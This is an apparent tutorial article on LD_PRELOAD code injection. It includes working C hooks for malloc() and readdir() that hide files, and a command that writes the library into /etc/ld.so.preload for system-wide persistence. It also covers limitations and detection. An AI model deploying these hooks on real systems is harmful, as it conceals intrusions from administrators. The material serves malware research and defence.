Memory Malware Part 0x2 — Crafting LD_PRELOAD Rootkits in Userland
Silence is harder to predict than the noise ×_×
As a person possessive of my beloved operating system, I’ve often wondered if it is being honest with me or hiding stuff that matters (anything that could break my heart). Well, I thought it was a bad liar until the day I came across the world of rootkits. So, here is an article that intends to shed some light on the dark world of rootkits by demonstrating the whole process of injection and execution of malware on behalf of a process. The idea of code injection discussed here is known as SO (Shared Object) injection on Linux, analogous to DLL injection on Windows. In this series of articles, we start off with the easiest yet decently effective method of shared library injection in userspace: LD_PRELOAD injection. Later in the article, we will see how this technique can be leveraged to craft a simple userspace rootkit.
- This article continues the previous one and is written assuming a basic understanding of program binaries and the way they turn into processes.
- Understanding of the ELF file format would be helpful but not necessary.
- A basic understanding of the Linux command line is assumed.
- The article is aimed at guiding beginners (having little or no knowledge about malware) to set their first foot into this territory. So, nothing more than endless curiosity and a hunger to learn is required.
ROOTKITS — Into the darker world
A rootkit is some software that may work independently or cooperatively with some other malicious code to conceal its presence as well as any malicious activities. It is usually intended to conceal the existence of files, directories, logins, processes, remote connections and any malicious activity intended by its payload.
How does a regular user or a system administrator usually look for a process (legitimate or malicious) on a system? By invoking some program like Task Manager or perhaps ps (on Linux). Internally, these programs leverage shared library functions, which in turn perform system calls (services offered by the operating system) to get the task done. Well, a rootkit intends to make these programs lie to their audience (a system administrator or perhaps a regular user).
Sheesh, how could it possibly do that ?
Suppose we write a simple program that uses printf() to print a “Hello hell” to the console. On Linux, printf is a function offered by the standard C library — libc.so.
When the program runs, it calls printf(), which internally performs the write() system call, writing “Hello hell” to the console. Performing syscalls is actually a way of asking the operating system to do a certain something on behalf of the user program. If a rootkit is somehow able to intercept these calls from a program (see Evil hook in the picture above), it can control the code flow of that program. Although a rootkit is capable of carrying out all sorts of malicious intentions, it is specifically designed to hide itself and its malicious activities.
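To make the layering concrete, here is a minimal sketch (not part of the original article's listings) that emits the same string twice: once through libc's printf() and once by handing the bytes straight to the write() wrapper. The function names hello_via_libc and hello_via_write are hypothetical, chosen only for illustration.

```c
#include <stdio.h>
#include <unistd.h>

/* Library route: printf() formats the text into libc's buffer,
 * and libc eventually issues the write() system call for us. */
int hello_via_libc(void)
{
    int n = printf("Hello hell\n");
    fflush(stdout);                 /* force the buffered bytes out now */
    return n;                       /* number of characters printed */
}

/* Direct route: skip the formatting layer and call write() ourselves. */
ssize_t hello_via_write(void)
{
    static const char msg[] = "Hello hell\n";
    return write(STDOUT_FILENO, msg, sizeof(msg) - 1);
}
```

Both functions end up at the same system call. A hook sitting in front of printf() would only see the first route, which is worth keeping in mind for the limitations discussed at the end.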
NOTE : This article will focus on rootkits in user space which won’t have direct access to all the resources like memory, peripherals and other hardware.
To be able to successfully hook (or intercept) system calls, a rootkit must be present inside the kernel space (after all, system calls are just services offered by the operating system). Similarly, to be able to intercept shared library calls, a rootkit must be present inside the process address space of an executing program. If getting into memory is the only step keeping us from hooking, I guess we know what to target ^_^
Dynamic Linker — An Innocent Smuggler
Dynamic linker or program interpreter is the one responsible for loading all the dependencies (present in the form of shared libraries) and hot-patching the program image before transferring control to the program’s entry point. On Linux, there are 3 legitimate approaches to load a shared library (SO binary) into the program’s address space —
- The dlopen API has the dlopen() function that loads a shared object into calling process’s address space (analogous to LoadLibrary() on Windows).
- Entries specified as DT_NEEDED in dynamic section of the ELF binary are loaded as dependencies by dynamic linker prior to program execution. It serves as another interesting infection point in the world of ELF virus known as DT_NEEDED infection (which is out of scope for this article but will hopefully be covered later in disk-based infections of Malware Engineering series).
- Setting up LD_PRELOAD environment variable with the shared library to be loaded.
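As an illustration of the first approach, the sketch below loads the math library at runtime with dlopen() and looks up cos() with dlsym(). It assumes a glibc system where the library's soname is libm.so.6; the function name cos_via_dlopen and the -2.0 error value are hypothetical choices made for this example.

```c
#include <dlfcn.h>
#include <stddef.h>

/* Loads libm at runtime and calls its cos().
 * Returns -2.0 (outside the range of cos) if loading or lookup fails. */
double cos_via_dlopen(double x)
{
    /* Assumption: glibc's math library is installed as "libm.so.6". */
    void *handle = dlopen("libm.so.6", RTLD_LAZY);
    if (handle == NULL)
        return -2.0;

    /* dlsym() returns a void *, which we convert to the expected signature. */
    double (*cosine)(double) = (double (*)(double))dlsym(handle, "cos");
    double result = (cosine != NULL) ? cosine(x) : -2.0;

    dlclose(handle);
    return result;
}
```

On older glibc versions this needs to be linked with -ldl; newer versions ship these functions inside libc itself.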
Searching for Shared Library function
When a shared library function or an external symbol (a symbol defined outside the program) such as printf() is called by any program, the dynamic linker starts its search from the very first loaded SO. It starts by parsing that SO's symbol table; if it finds a symbol by the name of printf, it uses the definition provided by that SO, and if not, it hops onto the next loaded SO and so on until it finds one. In this way, a shared library that happens to be loaded first can override the functionality of subsequently loaded shared libraries.
$ LD_DEBUG=symbols ./demo
22632: symbol=printf; lookup in file=./demo 
22632: symbol=printf; lookup in file=/lib/x86_64-linux-gnu/libc.so.6 
(output omitted for brevity)
By setting the environment variable LD_DEBUG=symbols, we can analyse how the dynamic linker resolves symbols at runtime. According to the output above, it first checks if printf is a symbol internal to demo (the program itself), after which it starts looking for it in the loaded dependencies (in this case it's the standard C library, libc.so.6).
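The same question ("which object ends up providing this symbol?") can also be asked from inside a process. The sketch below is an assumption-laden illustration rather than anything from the original article: it resolves a name with dlsym(RTLD_DEFAULT, ...) and then uses the GNU extension dladdr() to report the file that contains the resulting address. The helper name symbol_provider is hypothetical.

```c
#define _GNU_SOURCE             /* dladdr() and RTLD_DEFAULT are GNU extensions */
#include <dlfcn.h>
#include <stddef.h>

/* Returns the path of the loaded object that provides `symbol`
 * in the default search order, or NULL if it cannot be resolved. */
const char *symbol_provider(const char *symbol)
{
    void *addr = dlsym(RTLD_DEFAULT, symbol);
    Dl_info info;

    if (addr == NULL || dladdr(addr, &info) == 0)
        return NULL;

    return info.dli_fname;      /* pathname of the object containing addr */
}
```

Called with "printf" in an ordinary dynamically linked program, this would be expected to point at the C library; with a preloaded library that defines the same name, it should point at that library instead.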
Dear LD_PRELOAD, can you do me a favour ?
Behaviour of dynamic linker can be influenced by setting up environment variables. Setting up LD_PRELOAD environment variable is a legitimate way of asking the dynamic linker to load the specified SO as a dependency before loading any other shared library into the process address space of invoked program. This has the effect of overriding the functionality of library functions.
Let’s try overriding the functionality of malloc() (defined in libc.so) by our own shared library (librootkit.so). We start by writing a function by the same name, malloc(), having the exact same prototype as libc’s malloc(). Our malloc() implementation does nothing more than printing a string on STDERR using fprintf().
// librootkit.c : Defines an attacker's implementation of malloc()
#define _GNU_SOURCE
#include <stdio.h>

void *malloc(size_t size)
{
    // payload: announce the hijack on stderr
    fprintf(stderr, "\n\t[-x-x-x-] Hijacked libc's malloc(%zu)\n\n", size);
    return NULL;    // no real allocation happens yet
}
Let’s create a file named innocent.c that performs a call to malloc().
// innocent.c : Performs a call to malloc().
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main()
{
    char *alloc = (char *)malloc(0x100);
    strncpy(alloc, "Sync your chakras\0", 18);
    fprintf(stderr, "\n\n[+] malloc() returned - %p \n\n", (void *)alloc);
    return 0;
}
NOTE : Do not use printf() or fprintf(stdout, …) inside librootkit.so yet, as they internally perform a call to malloc(). This could turn out to be a problem later.
We use GCC to compile the shared library (typically with something like gcc -shared -fPIC) and the test program. When we run ./innocent on its own, we get the intended output. Seems like malloc() did its job well !
Using the /usr/bin/ldd script, we can list all the dependencies of the innocent program, which happen to be libc.so.6 and the dynamic linker itself (/lib64/ld-linux-x86-64.so.2) in this case.
linux-vdso.so.1 or vDSO (virtual Dynamic Shared Object), used for optimisation of frequently used system calls, is a small SO internally used by the C library and can safely be ignored for now (see $ man 7 vdso).
$ ldd ./innocent # before setting LD_PRELOAD
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fc5abf5b000)
Now, we export the LD_PRELOAD environment variable and see the changes in the dependencies of the ./innocent program using ldd.
$ export LD_PRELOAD=./librootkit.so
$ ldd ./innocent # After setting LD_PRELOAD
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f542e0a6000)
There is an extra line of output now, indicating that the ./innocent program has another dependency named ./librootkit.so (0x00007f542e497000). Let’s run ./innocent again.
Clearly the output indicates that librootkit.so’s implementation of malloc() is invoked by the dynamic linker, which overrides libc.so.6’s version of malloc(). It seems like we successfully hijacked a libc.so function, but it returns a NULL pointer value which, when dereferenced by the ./innocent program, causes a crash (Segmentation fault). Crashes are too noisy !
To be able to quietly execute the rootkit payload, we need to return the value that the originally called function would have returned. We have 2 ways to solve this issue:
- Our malloc() function should implement the libc’s malloc() functionality as asked by the user. This would eliminate the need for libc’s malloc() entirely.
- Librootkit should somehow be able to call the libc’s malloc() and return the results to the calling program.
Since we are lazy, we decided to use libc’s malloc(). But whenever we invoke malloc(), the dynamic linker calls librootkit.so’s version of malloc(), since it is the first occurrence of malloc(). What we want instead is the next occurrence of malloc(), i.e. the one present in libc.so.
This kind of symbol lookup is exposed to programs through dlsym() (declared in the /usr/include/dlfcn.h header file), which returns the address of a symbol loaded into memory. With the pseudo-handle RTLD_DEFAULT as its first argument, dlsym() follows the default search order and returns the address of the first occurrence of the symbol. However, there is another pseudo-handle, RTLD_NEXT, that searches for the next occurrence of the symbol after the calling object. Using this we can find libc.so’s malloc() !
- Line 9 : This declares a function pointer original_malloc initialised to NULL. It will store the address of libc.so’s malloc().
- Line 11 — 26 : This is a hook having the same type for return value and arguments as that of libc’s malloc(). It should externally look the same as libc’s malloc to get dynamic linker into believing that it is the one intended to be called by the user.
- Line 13 — 14 : If original_malloc is NULL (i.e. the hook is not yet called even once), call dlsym() with RTLD_NEXT explicitly specifying to find the address of next occurrence of “malloc” after (or with reference to) the current object (librootkit.so). After the call, original_malloc stores the address of libc’s malloc().
- Line 16 — 19 : This contains the payload of the rootkit. Any good or evil comes here.
- Line 21 — 25 : It then calls for the original_malloc(), allocating size bytes on heap segment and returning the base address of allocated bytes to the calling program.
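The line numbers in the list above refer to the author's original listing, which is not reproduced here. As a stand-in, the following is a minimal sketch that follows the same steps; the layout and line numbers will differ, and the payload message is a hypothetical placeholder. It uses write() instead of fprintf() in the payload so that the hook does not call back into malloc() from inside itself.

```c
#define _GNU_SOURCE             /* needed for RTLD_NEXT */
#include <dlfcn.h>
#include <stddef.h>
#include <unistd.h>

/* Address of libc's malloc(), resolved lazily on the first call. */
static void *(*original_malloc)(size_t) = NULL;

/* Hook: same name and prototype as libc's malloc(). */
void *malloc(size_t size)
{
    if (original_malloc == NULL) {
        /* Ask for the next "malloc" after this object in the search order. */
        original_malloc = (void *(*)(size_t))dlsym(RTLD_NEXT, "malloc");
        if (original_malloc == NULL)
            return NULL;        /* lookup failed: act like a failed allocation */
    }

    /* Payload placeholder: any good or evil goes here. */
    static const char msg[] = "[hook] malloc() intercepted\n";
    ssize_t ignored = write(STDERR_FILENO, msg, sizeof(msg) - 1);
    (void)ignored;

    /* Hand the request to the real allocator and pass its result back. */
    return original_malloc(size);
}
```

Built as a shared object (linked with -ldl on older glibc versions) and preloaded, this should let ./innocent receive a valid pointer again while the payload still runs. One caveat worth stating as an assumption: the sketch relies on dlsym() not calling malloc() itself on the success path, which is the usual behaviour on glibc but is not guaranteed everywhere.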
Testing librootkit.so, we get our code executed with a clean departure of the program. Both the attacker and the user are now happy, each for a different reason. This is business !
Librootkit.so — Hide me away !
The ultimate aim of a rootkit is to hide itself and the malicious activities performed by its payload. Let’s see how we can hide librootkit files.
To be able to hide a file, we need to analyse and understand how a program like /usr/bin/find searches for a file on the system. We can trace all the library calls performed by a program via the /usr/bin/ltrace program. Let’s use it on /bin/ls.
critical@d3ad:~/EVIL_RABBIT/demo$ ltrace /bin/ls
readdir(0x55849512a9d0) = 0x55849512aa20
strlen("librootkit.c") = 12
fwrite_unlocked("librootkit.c", 1, 12, 0x7feb8fbf6760) = 12
(output omitted for brevity)
+++ exited (status 0) +++
It uses opendir(), readdir() and closedir(), declared in the /usr/include/dirent.h header file, to list the contents of a directory. opendir() returns a directory stream, readdir() returns a directory entry pointer, and closedir() closes the directory stream.
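A stripped-down version of that listing loop might look like the sketch below. It is only an approximation of what /bin/ls does (no sorting, no formatting), and the function name list_entries is hypothetical.

```c
#include <dirent.h>
#include <stdio.h>

/* Prints every entry name in `path`, one per line.
 * Returns the number of entries seen, or -1 if the directory cannot be opened. */
int list_entries(const char *path)
{
    DIR *dir = opendir(path);           /* open a directory stream */
    if (dir == NULL)
        return -1;

    int count = 0;
    struct dirent *entry;
    while ((entry = readdir(dir)) != NULL) {   /* NULL marks the end of the stream */
        puts(entry->d_name);
        count++;
    }

    closedir(dir);                      /* release the directory stream */
    return count;
}
```

Every name the user sees passes through the return value of readdir(), which is exactly why that function is an attractive place for a hook.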
Here, readdir() takes in a directory pointer and reads a directory entry. It returns a pointer of type struct dirent *, which has a member called d_name. The d_name member is a character array of 256 bytes storing the name of the directory entry. This is the name which we see as output of /bin/ls. However, it returns NULL if the end of the directory stream is reached, and errno is not changed. With this information in hand, our aim is to skip some specific directory entries to hide our files.
- Line 8 : It defines a macro HIDE_ME which is the file we want to hide. Currently the rootkit hides itself.
- Line 11 — 17 : Same as we did with malloc().
- Line 20 : We call original_readdir() to get a directory entry.
- Line 22 — 23 : It checks that the directory entry is not NULL and calls strncmp() to check whether the d_name member of the directory entry starts with HIDE_ME (i.e. “librootkit”). If both conditions are true, it calls original_readdir() to read the next directory entry, thereby skipping the directory entries whose d_name starts with “librootkit”.
- Line 25 : It returns a directory entry to the calling program.
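As with malloc(), the listing those line numbers refer to is not reproduced here, so the following is a sketch of a hook that follows the same steps rather than the author's exact code. It uses a loop instead of a single check so that several matching entries in a row are all skipped. Note the assumption that the target program calls readdir(); on some configurations programs use readdir64() instead, which would need its own hook.

```c
#define _GNU_SOURCE             /* needed for RTLD_NEXT */
#include <dirent.h>
#include <dlfcn.h>
#include <string.h>

#define HIDE_ME "librootkit"    /* name prefix of the entries to hide */

/* Address of libc's readdir(), resolved lazily on the first call. */
static struct dirent *(*original_readdir)(DIR *) = NULL;

/* Hook: same name and prototype as libc's readdir(). */
struct dirent *readdir(DIR *dirp)
{
    if (original_readdir == NULL) {
        original_readdir =
            (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");
        if (original_readdir == NULL)
            return NULL;        /* lookup failed: report end of stream */
    }

    struct dirent *entry;
    do {
        /* Keep reading while the entry name starts with HIDE_ME. */
        entry = original_readdir(dirp);
    } while (entry != NULL &&
             strncmp(entry->d_name, HIDE_ME, strlen(HIDE_ME)) == 0);

    return entry;               /* a visible entry, or NULL at the end */
}
```

From the caller's point of view the hidden entries simply never existed: the stream still ends with NULL, and errno is left as libc's readdir() set it.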
Running a program with the preloaded shared library “librootkit.so” results in hiding all files and folders whose names start with “librootkit”. Below is the proof of concept.
Preloading with every damn process
To get yourself loaded with every process on the system, there is a need to go beyond setting up environment variables. There is a file, /etc/ld.so.preload, which is consulted by the dynamic linker every single time it executes a program. This file should contain a whitespace-separated list of ELF shared objects to be loaded before the program (read $ man ld.so).
innocent innocent.c librootkit.c librootkit.so
$ echo $PWD/librootkit.so >> /etc/ld.so.preload
Just a word of warning !
Ask yourself again if you really want to get involved with this file. Adding an SO path to /etc/ld.so.preload has a system-wide effect. You may lose your beloved operating system if anything goes wrong with your hooked function (anything like a segmentation fault in the hooked readdir()), since the dynamic linker, whose functionality is getting subverted, is the one responsible for runtime linking of all the processes system-wide. I hope your decisions are wise.
Below is a visual representation of how the code flow changes in the presence of an evil hook.
You may also want to have a look at EVIL RABBIT — mere POC of a usermode rootkit hiding its presence and backdooring the system with a TCP Bind Shell.
Limitations and Detection
Although this technique is decently effective as a userland rootkit, it should not be considered a benchmark for code injection techniques, mainly because it lacks stealth and partly because it requires a new process to be created (or an existing process to be restarted). Also:
- It does not get triggered by statically compiled programs (although there are just a few to be seen), as they do not contain dynamic sections and hence don’t require runtime linking.
- It is easy to detect. By simply listing the SO dependencies via /usr/bin/ldd (a BASH script), one can see the malicious shared library tagging along with every program.
- Hijacking function calls to conceal its existence is less effective if an application retrieves data via direct system calls.
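The last point can be illustrated with a sketch that looks for a name in a directory without going through libc's readdir() at all. It is Linux-specific and assumption-heavy: it invokes the getdents64 system call through syscall(), and since libc does not export the record layout, the struct raw_dirent64 below is declared by hand (the struct and function names are hypothetical).

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Record layout returned by getdents64, declared by hand for this sketch. */
struct raw_dirent64 {
    uint64_t       d_ino;       /* inode number */
    int64_t        d_off;       /* offset to the next record */
    unsigned short d_reclen;    /* length of this record */
    unsigned char  d_type;      /* file type */
    char           d_name[];    /* null-terminated entry name */
};

/* Returns 1 if `name` exists in `path`, 0 if not, -1 on error.
 * A preloaded readdir() hook is never consulted on this path. */
int raw_dir_contains(const char *path, const char *name)
{
    int fd = open(path, O_RDONLY | O_DIRECTORY);
    if (fd < 0)
        return -1;

    _Alignas(struct raw_dirent64) char buf[4096];
    int found = 0;

    for (;;) {
        long n = syscall(SYS_getdents64, fd, buf, sizeof(buf));
        if (n < 0)
            found = -1;         /* the system call itself failed */
        if (n <= 0)
            break;              /* error or end of directory */

        /* Walk the variable-length records packed into the buffer. */
        for (long pos = 0; pos < n; ) {
            struct raw_dirent64 *d = (struct raw_dirent64 *)(buf + pos);
            if (strcmp(d->d_name, name) == 0)
                found = 1;
            pos += d->d_reclen;
        }
    }

    close(fd);
    return found;
}
```

Comparing the result of such a raw listing against what a readdir()-based tool reports is one simple way a defender could notice that something in userland is filtering directory entries.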
The reason I still wanted to cover it was because it serves as a good first foot into this area. In the next article of this series, we will be discussing process injection, i.e. code injection in already running programs.
DISCLAIMER: The techniques described in this article series are meant to promote malware research and should only be used for educational purposes. Don’t risk yourself by using them for malicious purposes, it might attract hell. Try to keep the world a safe place ×_×